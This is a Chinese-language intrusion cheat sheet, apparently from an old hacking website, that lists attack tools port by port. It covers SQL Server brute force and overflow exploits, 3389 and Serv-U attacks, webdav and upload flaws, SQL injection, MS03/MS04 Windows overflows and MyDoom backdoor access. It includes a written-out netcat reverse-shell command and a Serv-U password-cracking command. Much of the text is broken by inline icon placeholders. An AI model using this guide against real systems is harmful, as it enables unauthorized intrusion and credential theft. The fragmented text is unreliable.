1. 1433端口入侵
scanport.exe 查有1433
![](/icons/23290de.gif)
机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
=
对sql
![](/icons/23290de.gif)
sp2及以下
![](/icons/23290de.gif)
系统
![](/icons/23290dou.gif)
可用sql
![](/icons/23290de.gif)
hello 溢出漏洞入侵
![](/icons/23290dou2.gif)
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向
![](/icons/23290de.gif)
![](/icons/23290dou.gif)
测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe
![](/icons/23290dou.gif)
扫描空口令
![](/icons/23290de.gif)
机器
3. 3899
![](/icons/23290de.gif)
入侵
对很早
![](/icons/23290de.gif)
机器
![](/icons/23290dou.gif)
可以试试3389
![](/icons/23290de.gif)
溢出(win3389ex.exe)
对2000
![](/icons/23290de.gif)
机器
![](/icons/23290dou.gif)
可以试试字典暴破
![](/icons/23290dou2.gif)
(tscrack.exe)
4. 80入侵
对sp3以前
![](/icons/23290de.gif)
机器
![](/icons/23290dou.gif)
可以用webdav入侵;
对bbs论坛
![](/icons/23290dou.gif)
可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入
![](/icons/23290dou2.gif)
(小榕
![](/icons/23290de.gif)
注入软件Software)
![](/icons/23290dou2.gif)
5. serv-u入侵(21端口)
对5. 004及以下系统
![](/icons/23290dou.gif)
可用溢出入侵
![](/icons/23290dou2.gif)
(serv5004.exe)
对5.1.0.0及以下系统
![](/icons/23290dou.gif)
可用本地提升权限
![](/icons/23290dou2.gif)
(servlocal.exe)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
![](/icons/23290dd.gif)
对serv-u
![](/icons/23290de.gif)
MD5加密密码
![](/icons/23290dou.gif)
可以用字典暴破
![](/icons/23290dou2.gif)
(crack.vbs)
输入
![](/icons/23290yi.gif)
个被serv-u加密
![](/icons/23290de.gif)
密码(34位长)
![](/icons/23290dou.gif)
通过和字典档(dict.txt)
![](/icons/23290de.gif)
比较
![](/icons/23290dou.gif)
得到密码
![](/icons/23290dou2.gif)
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵
![](/icons/23290dou2.gif)
7. 6129端口
用DameWare6129.exe入侵
![](/icons/23290dou2.gif)
8. 系统漏洞
利用135、445端口
![](/icons/23290dou.gif)
用ms03026、ms03039、ms03049、ms04011漏洞
![](/icons/23290dou.gif)
进行溢出入侵
![](/icons/23290dou2.gif)
9. 3127等端口
可以利用doom病毒开
![](/icons/23290de.gif)
端口
![](/icons/23290dou.gif)
用nodoom.exe入侵
![](/icons/23290dou2.gif)
(可用mydoomscan.exe查)
![](/icons/23290dou2.gif)
10. 其他入侵
利用shanlu
![](/icons/23290de.gif)
入侵软件Software入侵(WINNTAutoAttack.exe)
上
篇文章: 你知道多少?防火墙安装终极攻略
下
篇文章: 上网
千问
Tags:
延伸阅读
最新评论